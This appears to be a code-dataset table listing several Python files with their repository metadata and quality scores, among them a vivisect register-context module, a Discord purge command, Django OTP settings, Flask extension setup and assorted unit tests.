max_stars_repo_path
stringlengths 5
128
| max_stars_repo_name
stringlengths 8
105
| max_stars_count
int64 0
41.3k
| id
stringlengths 5
5
| content
stringlengths 19
155k
| content_cleaned
stringlengths 17
155k
| language
stringclasses 18
values | language_score
float64 0.05
1
| edu_score
float64 0.76
4.4
| edu_int_score
int64 1
4
|
---|---|---|---|---|---|---|---|---|---|
lmctl/project/mutate/base.py | manojn97/lmctl | 3 | 13500 | import abc
class Mutator(abc.ABC):
def apply(self, original_content):
return original_content
| import abc
class Mutator(abc.ABC):
def apply(self, original_content):
return original_content
| none | 1 | 3.110995 | 3 |
src/django_otp/conf.py | jaap3/django-otp | 318 | 13501 | <filename>src/django_otp/conf.py
import django.conf
class Settings:
"""
This is a simple class to take the place of the global settings object. An
instance will contain all of our settings as attributes, with default values
if they are not specified by the configuration.
"""
defaults = {
'OTP_LOGIN_URL': django.conf.settings.LOGIN_URL,
'OTP_ADMIN_HIDE_SENSITIVE_DATA': False,
}
def __getattr__(self, name):
if name in self.defaults:
return getattr(django.conf.settings, name, self.defaults[name])
else:
return getattr(django.conf.settings, name)
settings = Settings()
| <filename>src/django_otp/conf.py
import django.conf
class Settings:
"""
This is a simple class to take the place of the global settings object. An
instance will contain all of our settings as attributes, with default values
if they are not specified by the configuration.
"""
defaults = {
'OTP_LOGIN_URL': django.conf.settings.LOGIN_URL,
'OTP_ADMIN_HIDE_SENSITIVE_DATA': False,
}
def __getattr__(self, name):
if name in self.defaults:
return getattr(django.conf.settings, name, self.defaults[name])
else:
return getattr(django.conf.settings, name)
settings = Settings()
| pt | 0.144566 | 3.088048 | 3 |
Moderation/purge.py | DevFlock/Multis | 3 | 13502 | import asyncio
import discord
from discord.ext import commands
from discord.ext.commands.core import has_permissions
class cog(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command(aliases=["clear"])
@has_permissions(ban_members=True)
async def purge(self, ctx, count):
await ctx.channel.purge(limit=count+1)
message = await ctx.send(f"Deleted {count} messages.")
asyncio.sleep(2)
await message.delete()
def setup(client):
client.add_cog(cog(client))
| import asyncio
import discord
from discord.ext import commands
from discord.ext.commands.core import has_permissions
class cog(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command(aliases=["clear"])
@has_permissions(ban_members=True)
async def purge(self, ctx, count):
await ctx.channel.purge(limit=count+1)
message = await ctx.send(f"Deleted {count} messages.")
asyncio.sleep(2)
await message.delete()
def setup(client):
client.add_cog(cog(client))
| none | 1 | 2.432014 | 2 |
tensorboard/acceptance/__init__.py | DeepLearnI/atlas | 296 | 13503 | from .test_tensorboard_rest_api import TestTensorboardRestAPI
from .test_tensorboard_server import TestTensorboardServer
from .test_tensorboard_endpoints import TestTensorboardEndpoint | from .test_tensorboard_rest_api import TestTensorboardRestAPI
from .test_tensorboard_server import TestTensorboardServer
from .test_tensorboard_endpoints import TestTensorboardEndpoint | none | 1 | 0.991267 | 1 |
tests/store/test_fetch_purchases_to_ship.py | yuzi-ziyu/alphasea-agent | 1 | 13504 | from unittest import TestCase
from ..helpers import (
create_web3,
create_contract,
get_future_execution_start_at_timestamp,
proceed_time,
get_prediction_time_shift,
get_purchase_time_shift,
get_shipping_time_shift,
get_publication_time_shift,
get_tournament_id,
get_chain_id,
create_store,
generate_redis_namespace,
BaseHardhatTestCase
)
from src.web3 import get_account_address
execution_start_at = get_future_execution_start_at_timestamp()
content = 'abc'.encode()
model_id = 'model1'
model_id_other = 'model_other'
class TestStoreFetchPurchasesToShip(BaseHardhatTestCase):
def setUp(self):
super().setUp()
w3 = create_web3()
contract = create_contract(w3)
store = create_store(w3, contract)
self.store = store
self.w3 = w3
w3_other = create_web3(account_index=1)
contract_other = create_contract(w3_other)
store_other = create_store(w3_other, contract_other)
w3_purchaser = create_web3(account_index=2)
contract_purchaser = create_contract(w3_purchaser)
store_purchaser = create_store(w3_purchaser, contract_purchaser)
self.store_purchaser = store_purchaser
self.w3_purchaser = w3_purchaser
# predict
proceed_time(w3, execution_start_at + get_prediction_time_shift())
store.create_models_if_not_exist([dict(
model_id=model_id,
tournament_id=get_tournament_id(),
prediction_license='CC0-1.0',
)])
store.create_predictions([dict(
model_id=model_id,
execution_start_at=execution_start_at,
content=content,
price=1,
)])
# other predict
store_other.create_models_if_not_exist([dict(
model_id=model_id_other,
tournament_id=get_tournament_id(),
prediction_license='CC0-1.0',
)])
store_other.create_predictions([dict(
model_id=model_id_other,
execution_start_at=execution_start_at,
content=content,
price=1,
)])
# purchase
proceed_time(w3, execution_start_at + get_purchase_time_shift())
store_purchaser.create_purchases([dict(
model_id=model_id,
execution_start_at=execution_start_at,
), dict(
model_id=model_id_other,
execution_start_at=execution_start_at,
)])
def test_ok(self):
purchases = self.store.fetch_purchases_to_ship(
tournament_id=get_tournament_id(),
execution_start_at=execution_start_at
)
self.assertEqual(purchases, [{
**purchases[0],
'model_id': model_id,
'execution_start_at': execution_start_at,
'purchaser': get_account_address(self.w3_purchaser.eth.default_account),
}])
def test_different_tournament_id(self):
purchases = self.store.fetch_purchases_to_ship(
tournament_id='different',
execution_start_at=execution_start_at
)
self.assertEqual(purchases, [])
def test_different_execution_start_at(self):
purchases = self.store.fetch_purchases_to_ship(
tournament_id=get_tournament_id(),
execution_start_at=execution_start_at + 1,
)
self.assertEqual(purchases, [])
def test_already_shipped(self):
store = self.store
# ship
proceed_time(self.w3, execution_start_at + get_shipping_time_shift())
store.ship_purchases([dict(
model_id=model_id,
execution_start_at=execution_start_at,
purchaser=get_account_address(self.w3_purchaser.eth.default_account),
)])
purchases = store.fetch_purchases_to_ship(
tournament_id=get_tournament_id(),
execution_start_at=execution_start_at,
)
self.assertEqual(purchases, [])
| from unittest import TestCase
from ..helpers import (
create_web3,
create_contract,
get_future_execution_start_at_timestamp,
proceed_time,
get_prediction_time_shift,
get_purchase_time_shift,
get_shipping_time_shift,
get_publication_time_shift,
get_tournament_id,
get_chain_id,
create_store,
generate_redis_namespace,
BaseHardhatTestCase
)
from src.web3 import get_account_address
execution_start_at = get_future_execution_start_at_timestamp()
content = 'abc'.encode()
model_id = 'model1'
model_id_other = 'model_other'
class TestStoreFetchPurchasesToShip(BaseHardhatTestCase):
def setUp(self):
super().setUp()
w3 = create_web3()
contract = create_contract(w3)
store = create_store(w3, contract)
self.store = store
self.w3 = w3
w3_other = create_web3(account_index=1)
contract_other = create_contract(w3_other)
store_other = create_store(w3_other, contract_other)
w3_purchaser = create_web3(account_index=2)
contract_purchaser = create_contract(w3_purchaser)
store_purchaser = create_store(w3_purchaser, contract_purchaser)
self.store_purchaser = store_purchaser
self.w3_purchaser = w3_purchaser
# predict
proceed_time(w3, execution_start_at + get_prediction_time_shift())
store.create_models_if_not_exist([dict(
model_id=model_id,
tournament_id=get_tournament_id(),
prediction_license='CC0-1.0',
)])
store.create_predictions([dict(
model_id=model_id,
execution_start_at=execution_start_at,
content=content,
price=1,
)])
# other predict
store_other.create_models_if_not_exist([dict(
model_id=model_id_other,
tournament_id=get_tournament_id(),
prediction_license='CC0-1.0',
)])
store_other.create_predictions([dict(
model_id=model_id_other,
execution_start_at=execution_start_at,
content=content,
price=1,
)])
# purchase
proceed_time(w3, execution_start_at + get_purchase_time_shift())
store_purchaser.create_purchases([dict(
model_id=model_id,
execution_start_at=execution_start_at,
), dict(
model_id=model_id_other,
execution_start_at=execution_start_at,
)])
def test_ok(self):
purchases = self.store.fetch_purchases_to_ship(
tournament_id=get_tournament_id(),
execution_start_at=execution_start_at
)
self.assertEqual(purchases, [{
**purchases[0],
'model_id': model_id,
'execution_start_at': execution_start_at,
'purchaser': get_account_address(self.w3_purchaser.eth.default_account),
}])
def test_different_tournament_id(self):
purchases = self.store.fetch_purchases_to_ship(
tournament_id='different',
execution_start_at=execution_start_at
)
self.assertEqual(purchases, [])
def test_different_execution_start_at(self):
purchases = self.store.fetch_purchases_to_ship(
tournament_id=get_tournament_id(),
execution_start_at=execution_start_at + 1,
)
self.assertEqual(purchases, [])
def test_already_shipped(self):
store = self.store
# ship
proceed_time(self.w3, execution_start_at + get_shipping_time_shift())
store.ship_purchases([dict(
model_id=model_id,
execution_start_at=execution_start_at,
purchaser=get_account_address(self.w3_purchaser.eth.default_account),
)])
purchases = store.fetch_purchases_to_ship(
tournament_id=get_tournament_id(),
execution_start_at=execution_start_at,
)
self.assertEqual(purchases, [])
| it | 0.141563 | 2.148052 | 2 |
tests/test_add_option_backtrace.py | ponponon/loguru | 11,391 | 13505 | <reponame>ponponon/loguru<gh_stars>1000+
from loguru import logger
# See "test_catch_exceptions.py" for extended testing
def test_backtrace(writer):
logger.add(writer, format="{message}", backtrace=True)
try:
1 / 0
except Exception:
logger.exception("")
result_with = writer.read().strip()
logger.remove()
writer.clear()
logger.add(writer, format="{message}", backtrace=False)
try:
1 / 0
except Exception:
logger.exception("")
result_without = writer.read().strip()
assert len(result_with.splitlines()) > len(result_without.splitlines())
| from loguru import logger
# See "test_catch_exceptions.py" for extended testing
def test_backtrace(writer):
logger.add(writer, format="{message}", backtrace=True)
try:
1 / 0
except Exception:
logger.exception("")
result_with = writer.read().strip()
logger.remove()
writer.clear()
logger.add(writer, format="{message}", backtrace=False)
try:
1 / 0
except Exception:
logger.exception("")
result_without = writer.read().strip()
assert len(result_with.splitlines()) > len(result_without.splitlines()) | it | 0.24827 | 2.834776 | 3 |
BasicPythonPrograms/PythonDestructor.py | Pushkar745/PythonProgramming | 0 | 13506 | <reponame>Pushkar745/PythonProgramming<gh_stars>0
class Employee:
#Initializaing
def __init__(self):
print('Employee created ')
#Deleting (Calling destructor)
def __del__(self):
print('Destructor called,Employee deleted')
obj=Employee()
del obj | class Employee:
#Initializaing
def __init__(self):
print('Employee created ')
#Deleting (Calling destructor)
def __del__(self):
print('Destructor called,Employee deleted')
obj=Employee()
del obj | it | 0.099496 | 3.459575 | 3 |
envi/registers.py | ConfusedMoonbear/vivisect | 1 | 13507 | <reponame>ConfusedMoonbear/vivisect
"""
Similar to the memory subsystem, this is a unified way to
access information about objects which contain registers
"""
import envi.bits as e_bits
from envi.const import *
class InvalidRegisterName(Exception):
pass
class RegisterContext:
def __init__(self, regdef=(), metas=(), pcindex=None, spindex=None, srindex=None):
"""
Hand in a register definition which consists of
a list of (<name>, <width>) tuples.
"""
self.loadRegDef(regdef)
self.loadRegMetas(metas)
self.setRegisterIndexes(pcindex, spindex, srindex=srindex)
self._rctx_dirty = False
def getRegisterSnap(self):
"""
Use this to bulk save off the register state.
"""
return list(self._rctx_vals)
def setRegisterSnap(self, snap):
"""
Use this to bulk restore the register state.
NOTE: This may only be used under the assumption that the
RegisterContext has been initialized the same way
(like context switches in tracers, or emulaction snaps)
"""
self._rctx_vals = list(snap)
def isDirty(self):
"""
Returns true if registers in this context have been modififed
since their import.
"""
return self._rctx_dirty
def setIsDirty(self, bool):
self._rctx_dirty = bool
def setRegisterIndexes(self, pcindex, spindex, srindex=None):
self._rctx_pcindex = pcindex
self._rctx_spindex = spindex
self._rctx_srindex = srindex
def loadRegDef(self, regdef, defval=0):
"""
Load a register definition. A register definition consists
of a list of tuples with the following format:
(regname, regwidth)
NOTE: All widths in envi RegisterContexts are in bits.
"""
self._rctx_regdef = regdef # Save this for snaps etc..
self._rctx_names = {}
self._rctx_ids = {}
self._rctx_widths = []
self._rctx_vals = []
self._rctx_masks = []
for i, (name, width) in enumerate(regdef):
self._rctx_names[name] = i
self._rctx_ids[i] = name
self._rctx_widths.append(width)
self._rctx_masks.append((2**width)-1)
self._rctx_vals.append(defval)
def getRegDef(self):
return self._rctx_regdef
def loadRegMetas(self, metas, statmetas=None):
"""
Load a set of defined "meta" registers for this architecture. Meta
registers are defined as registers who exist as a subset of the bits
in some other "real" register. The argument metas is a list of tuples
with the following format:
(regname, regidx, reg_shift_offset, reg_width)
The given example is for the AX register in the i386 subsystem
regname: "ax"
reg_shift_offset: 0
reg_width: 16
Optionally a set of status meta registers can be loaded as well.
The argument is a list of tuples with the following format:
(regname, regidx, reg_shift_offset, reg_width, description)
"""
self._rctx_regmetas = metas
for name, idx, offset, width in metas:
self.addMetaRegister(name, idx, offset, width)
self._rctx_statmetas = statmetas
def addMetaRegister(self, name, idx, offset, width):
"""
Meta registers are registers which are really just directly
addressable parts of already existing registers (eax -> al).
To add a meta register, you give the name, the idx of the *real*
register, the width of the meta reg, and it's left shifted (in bits)
offset into the real register value. The RegisterContext will take
care of accesses after that.
"""
newidx = (offset << 24) + (width << 16) + idx
self._rctx_names[name] = newidx
self._rctx_ids[newidx] = name
def isMetaRegister(self, index):
return (index & 0xffff) != index
def _rctx_Import(self, sobj):
"""
Given an object with attributes with the same names as
registers in our context, populate our values from it.
NOTE: This also clears the dirty flag
"""
# On import from a structure, we are clean again.
self._rctx_dirty = False
for name,idx in self._rctx_names.items():
# Skip meta registers
if (idx & 0xffff) != idx:
continue
x = getattr(sobj, name, None)
if x != None:
self._rctx_vals[idx] = x
def _rctx_Export(self, sobj):
"""
Given an object with attributes with the same names as
registers in our context, set the ones he has to match
our values.
"""
for name,idx in self._rctx_names.items():
# Skip meta registers
if (idx & 0xffff) != idx:
continue
if hasattr(sobj, name):
setattr(sobj, name, self._rctx_vals[idx])
def getRegisterInfo(self, meta=False):
"""
Return an object which can be stored off, and restored
to re-initialize a register context. (much like snapshot
but it takes the definitions with it)
"""
regdef = self._rctx_regdef
regmeta = self._rctx_regmetas
pcindex = self._rctx_pcindex
spindex = self._rctx_spindex
snap = self.getRegisterSnap()
return (regdef, regmeta, pcindex, spindex, snap)
def setRegisterInfo(self, info):
regdef, regmeta, pcindex, spindex, snap = info
self.loadRegDef(regdef)
self.loadRegMetas(regmeta)
self.setRegisterIndexes(pcindex, spindex)
self.setRegisterSnap(snap)
def getRegisterName(self, index):
return self._rctx_ids.get(index,"REG%.8x" % index)
def getProgramCounter(self):
"""
Get the value of the program counter for this register context.
"""
return self.getRegister(self._rctx_pcindex)
def setProgramCounter(self, value):
"""
Set the value of the program counter for this register context.
"""
self.setRegister(self._rctx_pcindex, value)
def getStackCounter(self):
return self.getRegister(self._rctx_spindex)
def setStackCounter(self, value):
self.setRegister(self._rctx_spindex, value)
def hasStatusRegister(self):
'''
Returns True if this context is aware of a status register.
'''
if self._rctx_srindex == None:
return False
return True
def getStatusRegNameDesc(self):
'''
Return a list of status register names and descriptions.
'''
return [(name, desc) for name, idx, offset, width, desc in self._rctx_statmetas]
def getStatusRegister(self):
'''
Gets the status register for this register context.
'''
return self.getRegister(self._rctx_srindex)
def setStatusRegister(self, value):
'''
Sets the status register for this register context.
'''
self.setRegister(self._rctx_srindex, value)
def getStatusFlags(self):
'''
Return a dictionary of reg name and reg value for the meta registers
that are part of the status register.
'''
ret = {}
for name, idx, offset, width, desc in self._rctx_statmetas:
ret[name] = self.getRegisterByName(name)
return ret
def getRegisterByName(self, name):
idx = self._rctx_names.get(name)
if idx == None:
raise InvalidRegisterName("Unknown Register: %s" % name)
return self.getRegister(idx)
def setRegisterByName(self, name, value):
idx = self._rctx_names.get(name)
if idx == None:
raise InvalidRegisterName("Unknown Register: %s" % name)
self.setRegister(idx, value)
def getRegisterNames(self):
'''
Returns a list of the 'real' (non meta) registers.
'''
regs = [rname for rname, ridx in self._rctx_names.items()
if not self.isMetaRegister(ridx)]
return regs
def getRegisterNameIndexes(self):
'''
Return a list of all the 'real' (non meta) registers and their indexes.
Example: for regname, regidx in x.getRegisterNameIndexes():
'''
regs = [(rname, ridx) for rname, ridx in self._rctx_names.items()
if not self.isMetaRegister(ridx)]
return regs
def getRegisters(self):
"""
Get all the *real* registers from this context as a dictionary of name
value pairs.
"""
ret = {}
for name,idx in self._rctx_names.items():
if (idx & 0xffff) != idx:
continue
ret[name] = self.getRegister(idx)
return ret
def setRegisters(self, regdict):
"""
For any name value pairs in the specified dictionary, set the current
register values in this context.
"""
for name,value in regdict.items():
self.setRegisterByName(name, value)
def getRegisterIndex(self, name):
"""
Get a register index by name.
(faster to use the index multiple times)
"""
return self._rctx_names.get(name)
def getRegisterWidth(self, index):
"""
Return the width of the register which lives at the specified
index (width is always in bits).
"""
ridx = index & 0xffff
if ridx == index:
return self._rctx_widths[index]
width = (index >> 16) & 0xff
return width
def getRegister(self, index):
"""
Return the current value of the specified register index.
"""
ridx = index & 0xffff
value = self._rctx_vals[ridx]
if ridx != index:
value = self._xlateToMetaReg(index, value)
return value
def getMetaRegInfo(self, index):
'''
Return the appropriate realreg, shift, mask info
for the specified metareg idx (or None if it's not
meta).
Example:
real_reg, lshift, mask = r.getMetaRegInfo(x)
'''
ridx = index & 0xffff
if ridx == index:
return None
offset = (index >> 24) & 0xff
width = (index >> 16) & 0xff
mask = (2**width)-1
return ridx, offset, mask
def _xlateToMetaReg(self, index, value):
'''
Translate a register value to the meta register value
(used when getting a meta register)
'''
ridx = index & 0xffff
offset = (index >> 24) & 0xff
width = (index >> 16) & 0xff
mask = (2**width)-1
if offset != 0:
value >>= offset
return value & mask
def _xlateToNativeReg(self, index, value):
'''
Translate a register value to the native register value
(used when setting a meta register)
'''
ridx = index & 0xffff
width = (index >> 16) & 0xff
offset = (index >> 24) & 0xff
# FIXME is it faster to generate or look these up?
mask = (2 ** width) - 1
mask = mask << offset
# NOTE: basewidth is in *bits*
basewidth = self._rctx_widths[ridx]
basemask = (2 ** basewidth) - 1
# cut a whole in basemask at the size/offset of mask
finalmask = basemask ^ mask
curval = self._rctx_vals[ridx]
if offset:
value <<= offset
return value | (curval & finalmask)
def setRegister(self, index, value):
"""
Set a register value by index.
"""
self._rctx_dirty = True
ridx = index & 0xffff
# If it's a meta register index, lets mask it into
# the real thing...
if ridx != index:
value = self._xlateToNativeReg(index, value)
self._rctx_vals[ridx] = (value & self._rctx_masks[ridx])
def getRealRegisterNameByIdx(self, regidx):
"""
Returns the Name of the Containing register (in the case
of meta-registers) or the name of the register.
(by Index)
"""
return self.getRegisterName(regidx& RMETA_NMASK)
def getRealRegisterName(self, regname):
"""
Returns the Name of the Containing register (in the case
of meta-registers) or the name of the register.
"""
ridx = self.getRegisterIndex(regname)
if ridx != None:
return self.getRegisterName(ridx & RMETA_NMASK)
return regname
def addLocalEnums(l, regdef):
"""
Update a dictionary (or module locals) with REG_FOO index
values for all the base registers defined in regdef.
"""
for i,(rname,width) in enumerate(regdef):
l["REG_%s" % rname.upper()] = i
def addLocalStatusMetas(l, metas, statmetas, regname):
'''
Dynamically create data based on the status register meta register
definition.
Adds new meta registers and bitmask constants.
'''
for metaname, idx, offset, width, desc in statmetas:
# create meta registers
metas.append( (metaname, idx, offset, width) )
# create local bitmask constants (EFLAGS_%)
l['%s_%s' % (regname, metaname)] = 1 << offset # TODO: fix for arbitrary width
def addLocalMetas(l, metas):
"""
Update a dictionary (or module locals) with REG_FOO index
values for all meta registers defined in metas.
"""
for name, idx, offset, width in metas:
l["REG_%s" % name.upper()] = (offset << 24) | (width << 16) | idx
| """
Similar to the memory subsystem, this is a unified way to
access information about objects which contain registers
"""
import envi.bits as e_bits
from envi.const import *
class InvalidRegisterName(Exception):
pass
class RegisterContext:
def __init__(self, regdef=(), metas=(), pcindex=None, spindex=None, srindex=None):
"""
Hand in a register definition which consists of
a list of (<name>, <width>) tuples.
"""
self.loadRegDef(regdef)
self.loadRegMetas(metas)
self.setRegisterIndexes(pcindex, spindex, srindex=srindex)
self._rctx_dirty = False
def getRegisterSnap(self):
"""
Use this to bulk save off the register state.
"""
return list(self._rctx_vals)
def setRegisterSnap(self, snap):
"""
Use this to bulk restore the register state.
NOTE: This may only be used under the assumption that the
RegisterContext has been initialized the same way
(like context switches in tracers, or emulaction snaps)
"""
self._rctx_vals = list(snap)
def isDirty(self):
"""
Returns true if registers in this context have been modififed
since their import.
"""
return self._rctx_dirty
def setIsDirty(self, bool):
self._rctx_dirty = bool
def setRegisterIndexes(self, pcindex, spindex, srindex=None):
self._rctx_pcindex = pcindex
self._rctx_spindex = spindex
self._rctx_srindex = srindex
def loadRegDef(self, regdef, defval=0):
"""
Load a register definition. A register definition consists
of a list of tuples with the following format:
(regname, regwidth)
NOTE: All widths in envi RegisterContexts are in bits.
"""
self._rctx_regdef = regdef # Save this for snaps etc..
self._rctx_names = {}
self._rctx_ids = {}
self._rctx_widths = []
self._rctx_vals = []
self._rctx_masks = []
for i, (name, width) in enumerate(regdef):
self._rctx_names[name] = i
self._rctx_ids[i] = name
self._rctx_widths.append(width)
self._rctx_masks.append((2**width)-1)
self._rctx_vals.append(defval)
def getRegDef(self):
return self._rctx_regdef
def loadRegMetas(self, metas, statmetas=None):
"""
Load a set of defined "meta" registers for this architecture. Meta
registers are defined as registers who exist as a subset of the bits
in some other "real" register. The argument metas is a list of tuples
with the following format:
(regname, regidx, reg_shift_offset, reg_width)
The given example is for the AX register in the i386 subsystem
regname: "ax"
reg_shift_offset: 0
reg_width: 16
Optionally a set of status meta registers can be loaded as well.
The argument is a list of tuples with the following format:
(regname, regidx, reg_shift_offset, reg_width, description)
"""
self._rctx_regmetas = metas
for name, idx, offset, width in metas:
self.addMetaRegister(name, idx, offset, width)
self._rctx_statmetas = statmetas
def addMetaRegister(self, name, idx, offset, width):
"""
Meta registers are registers which are really just directly
addressable parts of already existing registers (eax -> al).
To add a meta register, you give the name, the idx of the *real*
register, the width of the meta reg, and it's left shifted (in bits)
offset into the real register value. The RegisterContext will take
care of accesses after that.
"""
newidx = (offset << 24) + (width << 16) + idx
self._rctx_names[name] = newidx
self._rctx_ids[newidx] = name
def isMetaRegister(self, index):
return (index & 0xffff) != index
def _rctx_Import(self, sobj):
"""
Given an object with attributes with the same names as
registers in our context, populate our values from it.
NOTE: This also clears the dirty flag
"""
# On import from a structure, we are clean again.
self._rctx_dirty = False
for name,idx in self._rctx_names.items():
# Skip meta registers
if (idx & 0xffff) != idx:
continue
x = getattr(sobj, name, None)
if x != None:
self._rctx_vals[idx] = x
def _rctx_Export(self, sobj):
"""
Given an object with attributes with the same names as
registers in our context, set the ones he has to match
our values.
"""
for name,idx in self._rctx_names.items():
# Skip meta registers
if (idx & 0xffff) != idx:
continue
if hasattr(sobj, name):
setattr(sobj, name, self._rctx_vals[idx])
def getRegisterInfo(self, meta=False):
"""
Return an object which can be stored off, and restored
to re-initialize a register context. (much like snapshot
but it takes the definitions with it)
"""
regdef = self._rctx_regdef
regmeta = self._rctx_regmetas
pcindex = self._rctx_pcindex
spindex = self._rctx_spindex
snap = self.getRegisterSnap()
return (regdef, regmeta, pcindex, spindex, snap)
def setRegisterInfo(self, info):
regdef, regmeta, pcindex, spindex, snap = info
self.loadRegDef(regdef)
self.loadRegMetas(regmeta)
self.setRegisterIndexes(pcindex, spindex)
self.setRegisterSnap(snap)
def getRegisterName(self, index):
return self._rctx_ids.get(index,"REG%.8x" % index)
def getProgramCounter(self):
"""
Get the value of the program counter for this register context.
"""
return self.getRegister(self._rctx_pcindex)
def setProgramCounter(self, value):
"""
Set the value of the program counter for this register context.
"""
self.setRegister(self._rctx_pcindex, value)
def getStackCounter(self):
return self.getRegister(self._rctx_spindex)
def setStackCounter(self, value):
self.setRegister(self._rctx_spindex, value)
def hasStatusRegister(self):
'''
Returns True if this context is aware of a status register.
'''
if self._rctx_srindex == None:
return False
return True
def getStatusRegNameDesc(self):
'''
Return a list of status register names and descriptions.
'''
return [(name, desc) for name, idx, offset, width, desc in self._rctx_statmetas]
def getStatusRegister(self):
'''
Gets the status register for this register context.
'''
return self.getRegister(self._rctx_srindex)
def setStatusRegister(self, value):
'''
Sets the status register for this register context.
'''
self.setRegister(self._rctx_srindex, value)
def getStatusFlags(self):
'''
Return a dictionary of reg name and reg value for the meta registers
that are part of the status register.
'''
ret = {}
for name, idx, offset, width, desc in self._rctx_statmetas:
ret[name] = self.getRegisterByName(name)
return ret
def getRegisterByName(self, name):
idx = self._rctx_names.get(name)
if idx == None:
raise InvalidRegisterName("Unknown Register: %s" % name)
return self.getRegister(idx)
def setRegisterByName(self, name, value):
idx = self._rctx_names.get(name)
if idx == None:
raise InvalidRegisterName("Unknown Register: %s" % name)
self.setRegister(idx, value)
def getRegisterNames(self):
'''
Returns a list of the 'real' (non meta) registers.
'''
regs = [rname for rname, ridx in self._rctx_names.items()
if not self.isMetaRegister(ridx)]
return regs
def getRegisterNameIndexes(self):
'''
Return a list of all the 'real' (non meta) registers and their indexes.
Example: for regname, regidx in x.getRegisterNameIndexes():
'''
regs = [(rname, ridx) for rname, ridx in self._rctx_names.items()
if not self.isMetaRegister(ridx)]
return regs
def getRegisters(self):
"""
Get all the *real* registers from this context as a dictionary of name
value pairs.
"""
ret = {}
for name,idx in self._rctx_names.items():
if (idx & 0xffff) != idx:
continue
ret[name] = self.getRegister(idx)
return ret
def setRegisters(self, regdict):
"""
For any name value pairs in the specified dictionary, set the current
register values in this context.
"""
for name,value in regdict.items():
self.setRegisterByName(name, value)
def getRegisterIndex(self, name):
"""
Get a register index by name.
(faster to use the index multiple times)
"""
return self._rctx_names.get(name)
def getRegisterWidth(self, index):
"""
Return the width of the register which lives at the specified
index (width is always in bits).
"""
ridx = index & 0xffff
if ridx == index:
return self._rctx_widths[index]
width = (index >> 16) & 0xff
return width
def getRegister(self, index):
"""
Return the current value of the specified register index.
"""
ridx = index & 0xffff
value = self._rctx_vals[ridx]
if ridx != index:
value = self._xlateToMetaReg(index, value)
return value
def getMetaRegInfo(self, index):
'''
Return the appropriate realreg, shift, mask info
for the specified metareg idx (or None if it's not
meta).
Example:
real_reg, lshift, mask = r.getMetaRegInfo(x)
'''
ridx = index & 0xffff
if ridx == index:
return None
offset = (index >> 24) & 0xff
width = (index >> 16) & 0xff
mask = (2**width)-1
return ridx, offset, mask
def _xlateToMetaReg(self, index, value):
'''
Translate a register value to the meta register value
(used when getting a meta register)
'''
ridx = index & 0xffff
offset = (index >> 24) & 0xff
width = (index >> 16) & 0xff
mask = (2**width)-1
if offset != 0:
value >>= offset
return value & mask
def _xlateToNativeReg(self, index, value):
'''
Translate a register value to the native register value
(used when setting a meta register)
'''
ridx = index & 0xffff
width = (index >> 16) & 0xff
offset = (index >> 24) & 0xff
# FIXME is it faster to generate or look these up?
mask = (2 ** width) - 1
mask = mask << offset
# NOTE: basewidth is in *bits*
basewidth = self._rctx_widths[ridx]
basemask = (2 ** basewidth) - 1
# cut a whole in basemask at the size/offset of mask
finalmask = basemask ^ mask
curval = self._rctx_vals[ridx]
if offset:
value <<= offset
return value | (curval & finalmask)
def setRegister(self, index, value):
"""
Set a register value by index.
"""
self._rctx_dirty = True
ridx = index & 0xffff
# If it's a meta register index, lets mask it into
# the real thing...
if ridx != index:
value = self._xlateToNativeReg(index, value)
self._rctx_vals[ridx] = (value & self._rctx_masks[ridx])
def getRealRegisterNameByIdx(self, regidx):
"""
Returns the Name of the Containing register (in the case
of meta-registers) or the name of the register.
(by Index)
"""
return self.getRegisterName(regidx& RMETA_NMASK)
def getRealRegisterName(self, regname):
"""
Returns the Name of the Containing register (in the case
of meta-registers) or the name of the register.
"""
ridx = self.getRegisterIndex(regname)
if ridx != None:
return self.getRegisterName(ridx & RMETA_NMASK)
return regname
def addLocalEnums(l, regdef):
    """
    Update a dictionary (or module locals) with REG_FOO index
    values for all the base registers defined in regdef.
    """
    # Each (name, width) pair gets a REG_<NAME> constant whose value
    # is its position in the register definition list.
    l.update(("REG_%s" % name.upper(), idx)
             for idx, (name, _width) in enumerate(regdef))
def addLocalStatusMetas(l, metas, statmetas, regname):
    '''
    Dynamically create data based on the status register meta register
    definition.

    Adds new meta registers and bitmask constants.
    '''
    for metaname, idx, offset, width, _desc in statmetas:
        # Register the meta-register definition (description dropped).
        metas.append((metaname, idx, offset, width))
        # Expose a bitmask constant named <REGNAME>_<METANAME>,
        # e.g. EFLAGS_CF.
        l["%s_%s" % (regname, metaname)] = 1 << offset  # TODO: fix for arbitrary width
def addLocalMetas(l, metas):
    """
    Update a dictionary (or module locals) with REG_FOO index
    values for all meta registers defined in metas.
    """
    for name, idx, offset, width in metas:
        # Pack offset (bits 24-31), width (bits 16-23) and the real
        # register index (bits 0-15) into one meta-register index.
        packed = (offset << 24) | (width << 16) | idx
        l["REG_%s" % name.upper()] = packed
services/nris-api/backend/app/extensions.py | parc-jason/mds | 0 | 13508 | <reponame>parc-jason/mds
from flask_caching import Cache
from flask_jwt_oidc import JwtManager
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate, MigrateCommand
from flask import current_app
from elasticapm.contrib.flask import ElasticAPM
from .config import Config
from .helper import Api
apm = ElasticAPM()
db = SQLAlchemy()
migrate = Migrate()
jwt = JwtManager()
cache = Cache()
api = Api(
prefix=f'{Config.BASE_PATH}',
doc=f'{Config.BASE_PATH}/',
default='nris_api',
default_label='NRIS related operations')
| from flask_caching import Cache
from flask_jwt_oidc import JwtManager
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate, MigrateCommand
from flask import current_app
from elasticapm.contrib.flask import ElasticAPM
from .config import Config
from .helper import Api
apm = ElasticAPM()
db = SQLAlchemy()
migrate = Migrate()
jwt = JwtManager()
cache = Cache()
api = Api(
prefix=f'{Config.BASE_PATH}',
doc=f'{Config.BASE_PATH}/',
default='nris_api',
default_label='NRIS related operations') | none | 1 | 1.886151 | 2 |
tests/test_mqtt_async.py | mpi-sws-rse/antevents-python | 7 | 13509 | <gh_stars>1-10
# Copyright 2017 by MPI-SWS and Data-Ken Research.
# Licensed under the Apache 2.0 License.
"""Test async version of mqtt libraries. Depends on hbmqtt
(https://github.com/beerfactory/hbmqtt)
"""
import unittest
import sys
import asyncio
import string
from random import choice, seed
from antevents.base import Scheduler, SensorPub, SensorEvent
import antevents.linq.output
import antevents.linq.combinators
import antevents.linq.select
from antevents.adapters.mqtt_async import QueueWriter, QueueReader
from antevents.linq.transducer import PeriodicMedianTransducer
